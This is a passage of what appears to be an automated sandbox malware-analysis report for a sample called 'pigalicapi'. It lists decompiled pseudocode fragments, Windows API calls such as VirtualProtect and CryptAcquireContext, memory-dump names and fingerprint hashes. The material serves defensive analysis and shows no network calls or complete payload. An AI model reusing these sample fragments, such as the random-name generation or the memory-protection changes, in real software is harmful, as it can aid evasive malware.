					_v56 = 0;
					while(_v56 < _a12) {
						_v60 = (( *(_t70 + _v56 - 0x14) & 0x000000ff) + _v56 + 1) * (_v56 + 2) % 0x1a;
						_a8[_v56] =  *((intOrPtr*)(_t70 + _v60 - 0x30));
						if(_v56 == 0) {
							CharUpperA(_a8); // executed
						}
						_v8 = _v8 + 1;
						_v56 = _v56 + 1;
					}
				}
				return _v8;
			}

0x024e5938
0x024e5943
0x024e5971
0x024e5986
0x024e5988
0x024e598a
0x024e598b
0x024e599d
0x024e59c6
0x024e59d6
0x024e59dc
0x024e59e2
0x024e59e2
0x024e59ee
0x024e599a
0x024e599a
0x024e599d
0x024e59fb

APIs

CharUpperA.USER32(00000000), ref: 024E59E2

Strings

abcdefghijklmnopqrstuvwxyz, xrefs: 024E597E

Memory Dump Source

Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true

Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd

Similarity

API ID: CharUpper
String ID: abcdefghijklmnopqrstuvwxyz
API String ID: 9403516-1277644989
Opcode ID: 24502c0283990be21275f7b0f836cd1736cae4d3f55588038331482453d93402
Instruction ID: e7b6931e84fb40c79b7092a6a5e557efa7aa3973db162a046480f4f1f802c9ba
Opcode Fuzzy Hash: 24502c0283990be21275f7b0f836cd1736cae4d3f55588038331482453d93402
Instruction Fuzzy Hash: 80214C31902208EBEF04CF98E584BEEBBB6FF9531AF24855AF80567340D3759A45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 004112B0 Relevance: 3.3, APIs: 2, Instructions: 305COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00411418
memset.NTDLL ref: 00411450

Memory Dump Source

Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd

Similarity

API ID: memsetrealloc
String ID:
API String ID: 3488966140-0
Opcode ID: 73e63d71c0d50dbc6898d8e05f666f7501ca3559874ea9105649bcf31ce7fe83
Instruction ID: dad7b14d47605fe78516e20dfcd52e82a159e52376bfce22ed144a28b74165c8
Opcode Fuzzy Hash: 73e63d71c0d50dbc6898d8e05f666f7501ca3559874ea9105649bcf31ce7fe83
Instruction Fuzzy Hash: 68D15CB0704305EFD720EF15E68079ABBF0AB84344F90882EE6858B361D7B99485CB5E

Uniqueness

Uniqueness Score: -1.00%

Function 0040D0C0 Relevance: 3.2, APIs: 2, Instructions: 200
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E0040D0C0(void* __ebx, signed int __edi, signed int __esi) {
				void* _v16;
				signed int _v44;
				char* _v56;
				char _v60;
				void* _v61;
				void* _v64;
				char* _v80;
				intOrPtr _v84;
				signed int _v88;
				intOrPtr _t61;
				void* _t66;
				int _t70;
				signed int _t74;
				long _t76;
				signed int _t80;
				void* _t81;
				signed int _t83;
				signed char* _t87;
				signed int _t93;
				intOrPtr* _t94;
				signed int _t98;
				signed int _t100;
				signed short _t101;
				signed char _t106;
				intOrPtr _t110;
				intOrPtr _t114;
				intOrPtr _t121;
				signed int _t122;
				signed int _t126;
				int _t135;
				void* _t145;
				char** _t147;

				_t130 = __esi;
				_t119 = __edi;
				_t61 =  *0x42206c; // 0x1
				if(_t61 == 0) {
					_push(__edi);
					_push(__esi);
					 *0x42206c = 1;
					_t66 = E0040DB20(0x0000001e + (E0040D950() + _t62 * 0x00000002) * 0x00000004 & 0xfffffff0, __ebx);
					 *0x422070 = 0;
					_t147 = _t145 - 0x4c - _t66;
					 *0x422074 =  &_v61 & 0xfffffff0;
					_t70 = 0x18;
					__eflags = 0x4219b4 - 7;
					if(0x4219b4 <= 7) {
						L14:
						return _t70;
					} else {
						__eflags = 0x4219b4 - 0xb;
						if(0x4219b4 <= 0xb) {
							_t93 = 0x42199c;
							goto L26;
						} else {
							_t70 =  *0x42199c; // 0x0
							__eflags = _t70;
							if(_t70 != 0) {
								L15:
								_t93 = 0x42199c;
								goto L16;
							} else {
								_t70 =  *0x4219a0; // 0x0
								__eflags = _t70;
								if(_t70 != 0) {
									goto L15;
								} else {
									_t119 =  *0x4219a4; // 0x1
									_t93 = 0x4219a8;
									__eflags = _t119;
									if(_t119 == 0) {
										L26:
										_t130 =  *_t93;
										__eflags =  *_t93;
										if( *_t93 != 0) {
											L16:
											__eflags = _t93 - 0x4219b4;
											if(_t93 >= 0x4219b4) {
												goto L14;
											} else {
												_v64 =  &_v56;
												do {
													_t17 = _t93 + 4; // 0x0
													_t110 =  *_t17;
													_t93 = _t93 + 8;
													_t18 = _t110 + 0x400000; // 0x400000
													_t19 = _t110 + 0x400000; // 0x905a4d
													_t20 = _t93 - 8; // 0x4e472820
													_v56 =  *_t19 +  *_t20;
													E0040CE80(_t18, _t93, 4, _v64, _t119, _t130);
													__eflags = _t93 - 0x4219b4;
												} while (_t93 < 0x4219b4);
												goto L19;
											}
										} else {
											_t38 = _t93 + 4; // 0x0
											_t95 =  *_t38;
											__eflags =  *_t38;
											if( *_t38 == 0) {
												goto L8;
											} else {
												goto L16;
											}
										}
									} else {
										_t93 = 0x42199c;
										L8:
										_t6 = _t93 + 8; // 0x1
										_t80 =  *_t6;
										__eflags = _t80 - 1;
										if(_t80 != 1) {
											L35:
											_v88 = _t80;
											 *_t147 = "  Unknown pseudo relocation protocol version %d.\n";
											_t81 = L0040CE20(_t93, _t95, _t109, _t119, _t130);
											0;
											0;
											asm("fninit");
											return _t81;
										} else {
											_t94 = _t93 + 0xc;
											__eflags = _t94 - 0x4219b4;
											if(_t94 < 0x4219b4) {
												do {
													_t114 =  *_t94;
													_t7 = _t94 + 4; // 0x312e382e
													_t121 =  *_t7;
													_t9 = _t121 + 0x400000; // 0x316e382e
													_t87 = _t9;
													_v64 =  *((intOrPtr*)(_t114 + 0x400000));
													_t11 = _t94 + 8; // 0x0
													_t100 =  *_t11 & 0x000000ff;
													__eflags = _t100 - 0x10;
													if(_t100 == 0x10) {
														_t101 =  *(_t121 + 0x400000) & 0x0000ffff;
														_t122 = _t101 & 0x0000ffff;
														__eflags = _t101;
														_t123 =  <  ? _t122 | 0xffff0000 : _t122;
														_t124 = ( <  ? _t122 | 0xffff0000 : _t122) - _t114;
														_t125 = ( <  ? _t122 | 0xffff0000 : _t122) - _t114 - 0x400000;
														_v64 =  &_v56;
														_t135 = _v64 + ( <  ? _t122 | 0xffff0000 : _t122) - _t114 - 0x400000;
														__eflags = _t135;
														_v56 = _t135;
														E0040CE80(_t87, _t94, 2,  &_v56, ( <  ? _t122 | 0xffff0000 : _t122) - _t114 - 0x400000, _t135);
														goto L30;
													} else {
														__eflags = _t100 - 0x20;
														if(_t100 == 0x20) {
															_v64 =  &_v56;
															_t138 = _v64 - _t114 + 0x400000 +  *_t87;
															_v56 = _v64 - _t114 + 0x400000 +  *_t87;
															E0040CE80(_t87, _t94, 4,  &_v56, _t121, _v64 - _t114 + 0x400000 +  *_t87); // executed
															goto L30;
														} else {
															__eflags = _t100 - 8;
															if(_t100 == 8) {
																_t106 =  *_t87 & 0x000000ff;
																_t126 = _t106 & 0x000000ff;
																__eflags = _t106;
																_t127 =  <  ? _t126 | 0xffffff00 : _t126;
																_t128 = ( <  ? _t126 | 0xffffff00 : _t126) - 0x400000;
																_t129 = ( <  ? _t126 | 0xffffff00 : _t126) - 0x400000 - _t114;
																_t138 = _v64 + ( <  ? _t126 | 0xffffff00 : _t126) - 0x400000 - _t114;
																_v64 =  &_v56;
																_v56 = _v64 + ( <  ? _t126 | 0xffffff00 : _t126) - 0x400000 - _t114;
																E0040CE80(_t87, _t94, 1,  &_v56, ( <  ? _t126 | 0xffffff00 : _t126) - 0x400000 - _t114, _v64 + ( <  ? _t126 | 0xffffff00 : _t126) - 0x400000 - _t114);
																goto L30;
															} else {
																_v88 = _t100;
																 *_t147 = "  Unknown pseudo relocation bit size %d.\n";
																_v56 = 0;
																_t70 = L0040CE20(_t94, _t100, _t114, _t121, _t138);
																goto L14;
															}
														}
													}
													goto L37;
													L30:
													_t94 = _t94 + 0xc;
													__eflags = _t94 - 0x4219b4;
												} while (_t94 < 0x4219b4);
												L19:
												_t70 =  *0x422070; // 0x1
												_t93 = 0;
												__eflags = _t70;
												if(_t70 > 0) {
													do {
														_t74 =  *0x422074; // 0x64fde0
														_t130 = _t93 + _t93 * 2;
														_t119 = _t130 * 4;
														_t70 = _t74 + _t119;
														_t109 =  *_t70;
														__eflags =  *_t70;
														if( *_t70 == 0) {
															goto L21;
														} else {
															_v84 = 0x1c;
															_v88 = _v64;
															_t29 = _t70 + 4; // 0x418aa0
															 *_t147 =  *_t29;
															_t76 = VirtualQuery(??, ??, ??);
															_t147 = _t147 - 0xc;
															__eflags = _t76;
															if(_t76 == 0) {
																_t98 =  *0x422074; // 0x64fde0
																_t95 = _t98 + _t119;
																__eflags = _t95;
																_t55 = _t95 + 4; // 0x418aa0
																_v84 =  *_t55;
																_t57 = _t95 + 8; // 0x41910c
																_t58 =  *_t57 + 8; // 0x10d00ff
																 *_t147 = "  VirtualQuery failed for %d bytes at address %p";
																_v88 =  *_t58;
																_t80 = L0040CE20(_t93, _t95, _t109, _t119, _t130);
																goto L35;
															} else {
																_v80 =  &_v60;
																_t83 =  *0x422074; // 0x64fde0
																_v84 =  *((intOrPtr*)(_t83 + _t130 * 4));
																_v88 = _v44;
																 *_t147 = _v56; // executed
																_t70 = VirtualProtect(??, ??, ??, ??); // executed
																_t147 = _t147 - 0x10;
																goto L21;
															}
														}
														goto L37;
														L21:
														_t93 = _t93 + 1;
														__eflags = _t93 -  *0x422070; // 0x1
													} while (__eflags < 0);
												} else {
												}
											}
											goto L14;
										}
									}
								}
							}
						}
					}
				} else {
					return _t61;
				}
				L37:
			}

Memory Dump Source

Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6dc5d2d502416e41f7d9eddc792febd8f4f97fcbe738563a939ef138da5529d8
Instruction ID: c9f2d9c8f812e7c608e2c1f9d0c6a3859adaa46158f161601ba7db1d9c1a457c
Opcode Fuzzy Hash: 6dc5d2d502416e41f7d9eddc792febd8f4f97fcbe738563a939ef138da5529d8
Instruction Fuzzy Hash: 6F719F71E012149FCB14CFA9E9807ADB7F1EF44304F54827BE845AB3A5DB389949CB89

Uniqueness

Uniqueness Score: -1.00%

Function 004112F9 Relevance: 3.1, APIs: 2, Instructions: 115COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00411418
memset.NTDLL ref: 00411450

Memory Dump Source

Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd

Similarity

API ID: memsetrealloc
String ID:
API String ID: 3488966140-0
Opcode ID: 97bb11881bd2020a3b0d54998a8ba70a51bdb0b6a11ad9c7bf1f36cbdd451e12
Instruction ID: 1e92ba9ca6738bd07df40508bbb0f1f8677d13f166ee6327e985d8f32876cbf7
Opcode Fuzzy Hash: 97bb11881bd2020a3b0d54998a8ba70a51bdb0b6a11ad9c7bf1f36cbdd451e12
Instruction Fuzzy Hash: 5E411C703003059FD720DF2ADA80B9A77E4EB45744F84452AEA59CB375E779E881CB58

Uniqueness

Uniqueness Score: -1.00%

Function 024E9400 Relevance: 3.1, APIs: 2, Instructions: 106
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E024E9400(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v91;
				char _v92;
				char _v220;
				intOrPtr _t59;
				void* _t103;
				void* _t104;
				void* _t106;

				_v8 = 0;
				if(_a4 != 0 && _a8 != 0 && _a12 > 0) {
					_t56 = E024E7B70( &_v28, _a4 + 0x45b, 0x10);
					_t104 = _t103 + 0xc;
					_v12 = _v28 ^ _v24 ^ _v20 ^ _v16;
					_v32 = 0;
					while(_v32 < _a12) {
						E024E7D20(_t56,  &_v220, 0, 0x80);
						_t59 = E024E8BB0( &_v12, 4,  &_v220, 0x80); // executed
						_t106 = _t104 + 0x1c;
						_v40 = _t59;
						if(_v40 <= 0) {
							_v12 = _v32 * 7 + _v12;
						} else {
							_v12 = _v220;
						}
						_v36 = _v12 % 4 + 9;
						E024E9650( &_v220, _v40, _v32 * 0x1e + _a8, _v36);
						E024E7D20( &_v92,  &_v92, 0, 0x32);
						_t104 = _t106 + 0x1c;
						lstrcpyA( &_v92, _v32 * 0x1e + _a8);
						_v91 = 0;
						CharUpperA( &_v92);
						 *((char*)(_a8 + _v32 * 0x1e)) = _v92;
						_v12 = _v12 + 1;
						_v8 = _v8 + 1;
						_t56 = _v32 + 1;
						_v32 = _v32 + 1;
					}
				}
				return _v8;
			}

0x024e9409
0x024e9414
0x024e943d
0x024e9442
0x024e9451
0x024e9454
0x024e9466
0x024e9480
0x024e949a
0x024e949f
0x024e94a2
0x024e94a9
0x024e94bf
0x024e94ab
0x024e94b1
0x024e94b1
0x024e94d1
0x024e94ed
0x024e94fd
0x024e9502
0x024e9513
0x024e9519
0x024e9521
0x024e9533
0x024e953c
0x024e9545
0x024e9460
0x024e9463
0x024e9463
0x024e9466
0x024e9553

APIs

Part of subcall function 024E8BB0: CryptAcquireContextA.ADVAPI32(00000000,024EC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 024E8BFF
Part of subcall function 024E8BB0: GetLastError.KERNEL32 ref: 024E8C09
Part of subcall function 024E8BB0: CryptAcquireContextA.ADVAPI32(00000000,024EC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 024E8C38
Part of subcall function 024E8BB0: CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 024E8C59
Part of subcall function 024E8BB0: CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 024E8C71
Part of subcall function 024E8BB0: CryptGetHashParam.ADVAPI32(00000000,00000004,00000000,00000004,00000000), ref: 024E8C99
Part of subcall function 024E8BB0: CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 024E8CC1
Part of subcall function 024E8BB0: CryptDestroyHash.ADVAPI32(00000000), ref: 024E8CD5
Part of subcall function 024E8BB0: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 024E8CE1

lstrcpyA.KERNEL32(?,00000000), ref: 024E9513
CharUpperA.USER32(?), ref: 024E9521

Memory Dump Source

Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true

Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd

Similarity

API ID: Crypt$Hash$Context$AcquireParam$CharCreateDataDestroyErrorLastReleaseUpperlstrcpy
String ID:
API String ID: 2710640451-0
Opcode ID: 1636e05cfdbdf8368fb59674020cc684270e96cc4f47b15cfc626c6f7eefa318
Instruction ID: 4d684f3afe434b2527a93fe681e31a761469c02c0948fa06eab4c52e121067f3
Opcode Fuzzy Hash: 1636e05cfdbdf8368fb59674020cc684270e96cc4f47b15cfc626c6f7eefa318
Instruction Fuzzy Hash: C64109B1D00248EBEF04DF95C881BEEBBB5EF58305F10855AD516AB281E734A685CF90

Uniqueness

Uniqueness Score: -1.00%

Function 100021EA Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 100021F9
SetLastError.KERNEL32(0000007E), ref: 1000223B
SetLastError.KERNEL32(0000000E), ref: 1000228B

Memory Dump Source

Source File: 00000001.00000002.669403930.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10001000_pigalicapi.jbxd

Similarity

API ID: ErrorLast$HugeRead
String ID:
API String ID: 100728148-0
Opcode ID: bd318f91544f178069688045f5b296fb20421188c60a54711fd69487c4a0a276
Instruction ID: 133c763f371e93ed1e981491a31024dabb451d2fe405ffdb26697d1a1c2a5393
Opcode Fuzzy Hash: bd318f91544f178069688045f5b296fb20421188c60a54711fd69487c4a0a276
Instruction Fuzzy Hash: 3301C975A01149EFEB04DF94C985B9EBBB5EF48354F208298E909AB255C734EF40DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0040FCA0 Relevance: 3.0, APIs: 2, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32(?,?,?,?,00A52548,004102E5,?,?,FFFFFFFF,0041032C), ref: 0040FCAE

Memory Dump Source

Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd

Similarity

API ID: Alloc
String ID:
API String ID: 2773662609-0
Opcode ID: 1d68505a4d2c2be1fd6997ff3538c2e8bada1c9bb70ca8cacadf71cbb6f6cc32
Instruction ID: 42ba0e2f8ca25937b9577218f0e8f1747412e3c7344b5913d50b7ca6b605e0fe
Opcode Fuzzy Hash: 1d68505a4d2c2be1fd6997ff3538c2e8bada1c9bb70ca8cacadf71cbb6f6cc32
Instruction Fuzzy Hash: 3DF0AFB0204305AFD730AFB6E94520A7AE0BB44304F85893EE99567791D778540ADB9E

Uniqueness

Uniqueness Score: -1.00%

Function 024E97C0 Relevance: 3.0, APIs: 2, Instructions: 12
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E024E97C0(void* _a4) {
				void* _t3;
				char _t6;

				if(_a4 != 0) {
					_t6 = RtlFreeHeap(GetProcessHeap(), 0, _a4); // executed
					return _t6;
				}
				return _t3;
			}

0x024e97c7
0x024e97d6
0x00000000
0x024e97d6
0x024e97dd

APIs

GetProcessHeap.KERNEL32(00000000,00000000), ref: 024E97CF
RtlFreeHeap.NTDLL(00000000), ref: 024E97D6

Memory Dump Source

Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true

Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: d2d76d143d232da7be93a88aa1c8ae047abdec23a224075daf2f12cf4052c050
Instruction ID: 7fb6e0992bd364820f1863aacb19fde10be1dac2ade9dfd37b4dc93c3663d17d
Opcode Fuzzy Hash: d2d76d143d232da7be93a88aa1c8ae047abdec23a224075daf2f12cf4052c050
Instruction Fuzzy Hash: B7C01271440608EBEF049ED4D44DBA5375CA704206F044403F60D89591C7709594CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0040F1C0 Relevance: 2.6, APIs: 2, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 11c03190e962a3336078bc9f9bd4b39e56c7c2d924a363fb5b6bd62e4403c688
Instruction ID: 9a935b580d19b4844a8e347fe3f337539f3ef189ba2f3eb9209136ab9bdebf7b
Opcode Fuzzy Hash: 11c03190e962a3336078bc9f9bd4b39e56c7c2d924a363fb5b6bd62e4403c688
Instruction Fuzzy Hash: D3313DB0204301DFD720EF65E54435ABBE0BB40708F518C7ED8859B792D7BD9889DB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040FB00 Relevance: 2.6, APIs: 2, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f19e27de350e72c2be21b91eb14c2c843b9591aa7770d22e79dbda54baac12c1
Instruction ID: b4ea5088bbc2e04cae5ca264721ad58746302421d82bc6471c19b5581d7aa8aa
Opcode Fuzzy Hash: f19e27de350e72c2be21b91eb14c2c843b9591aa7770d22e79dbda54baac12c1
Instruction Fuzzy Hash: 10311EB0608301DEE720EF61D59031ABAF4AB40344F44C83E9985AB695D7BC944ADF6A

Uniqueness

Uniqueness Score: -1.00%

Function 10001D10 Relevance: 1.6, APIs: 1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.669403930.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10001000_pigalicapi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f230ea85c0c82a46ce4fe9d3adae6cb5bbcd7638e6efd245ab957bab051541
Instruction ID: 8f4ecb97985d5e8621b4f5fb532634e6274162181c58748ea6569eeff33a15e4
Opcode Fuzzy Hash: d8f230ea85c0c82a46ce4fe9d3adae6cb5bbcd7638e6efd245ab957bab051541
Instruction Fuzzy Hash: D6418574A04109AFEB44CF44D494BEAB7B2FB88394F24C15AEC195B359D775EE82CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00415890 Relevance: 1.6, APIs: 1, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00415890(void* __ecx, void* __eflags, intOrPtr* _a4) {
				void* _v16;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				signed int _v48;
				intOrPtr _v56;
				void* __ebx;
				void* __esi;
				void* _t32;
				signed int _t35;
				signed int _t40;
				signed int _t47;
				signed int _t53;
				void* _t54;
				signed int _t55;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr* _t64;

				_t54 = __ecx;
				E00412210(); // executed
				_t32 = E00415320(_a4, _t54);
				if(_t32 == 0) {
					_t63 =  *_a4;
					_t35 = E00414E80(_t63);
					__eflags = _t35;
					_t53 = _t35;
					if(_t35 == 0) {
						__eflags =  *(_t63 + 8);
						if( *(_t63 + 8) != 0) {
							L12:
							 *_t64 = _t63 + 8;
							InterlockedIncrement(??);
						} else {
							_t55 =  *(_t63 + 0x10);
							_t40 =  *(_t63 + 0xc);
							__eflags = _t55;
							if(_t55 > 0) {
								_t40 = _t40 - _t55;
								__eflags = _t40;
								 *(_t63 + 0xc) = _t40;
								 *(_t63 + 0x10) = 0;
							}
							__eflags = _t40;
							if(_t40 <= 0) {
								goto L12;
							} else {
								 *(_t63 + 0x10) =  ~_t40;
								_t62 = _t63 + 0x18;
								_v40 = E00414F10;
								_v36 = _t63;
								_v32 =  *((intOrPtr*)(E00411E50()));
								asm("mfence");
								 *((intOrPtr*)(E00411E50())) =  &_v40;
								asm("mfence");
								_v48 = _t63 + 0x1c;
								while(1) {
									_v56 = _t62;
									 *_t64 = _v48;
									_t47 = E00416A70(__eflags);
									__eflags = _t47;
									if(_t47 != 0) {
										break;
									}
									__eflags =  *(_t63 + 0x10);
									if(__eflags >= 0) {
										 *((intOrPtr*)(E00411E50())) = _v32;
										 *(_t63 + 0xc) = 0;
										goto L12;
									} else {
										continue;
									}
									goto L13;
								}
								_v48 = _t47;
								 *((intOrPtr*)(E00411E50())) = _v32;
								 *_t64 = _v36;
								_v40();
								_t53 = _v48;
							}
						}
					}
					L13:
					return E00414F30(_a4, _t53, _t53, _t63);
				} else {
					return _t32;
				}
			}

Memory Dump Source

Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
